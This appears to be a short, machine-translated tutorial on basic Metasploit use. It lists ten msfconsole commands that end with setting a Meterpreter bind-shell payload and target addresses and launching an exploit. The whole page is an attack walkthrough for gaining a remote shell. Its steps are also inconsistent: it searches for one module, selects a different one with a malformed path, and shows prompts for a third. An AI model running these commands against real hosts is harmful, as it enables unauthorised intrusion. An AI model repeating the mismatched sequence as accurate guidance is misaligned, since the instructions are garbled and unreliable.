[Intranet penetration] Basic use of MSF's exploit and pyload

[Intranet penetration] Basic use of MSF's exploit and pyload

1. Connect MSF

root@kali:~# msfconsole

2. Display all attack modules

msf > show exploits |more

3. Find the attack module

msf > search ms08_067

4. Use the attack module

msf > use /exploits/windows/tftp/tftpd32_long_filename

5. Display payloads

msf > show paylods

6. Set payloads

msf exploit(php_cgi_arg_injection) > set PAYLOAD php/meterpreter/bind_tcp

7. Query settings

msf exploit(php_cgi_arg_injection) > show options

8. Monitor local IP

msf exploit(php_cgi_arg_injection) > set LHOST 192.168.1.88

9. Monitor the target IP

msf exploit(php_cgi_arg_injection) > set RHOST 192.168.1.74

10. Start the attack

msf exploit(php_cgi_arg_injection) > exploit

Guess you like

Origin http://43.154.161.224:23101/article/api/json?id=324756259&siteId=291194637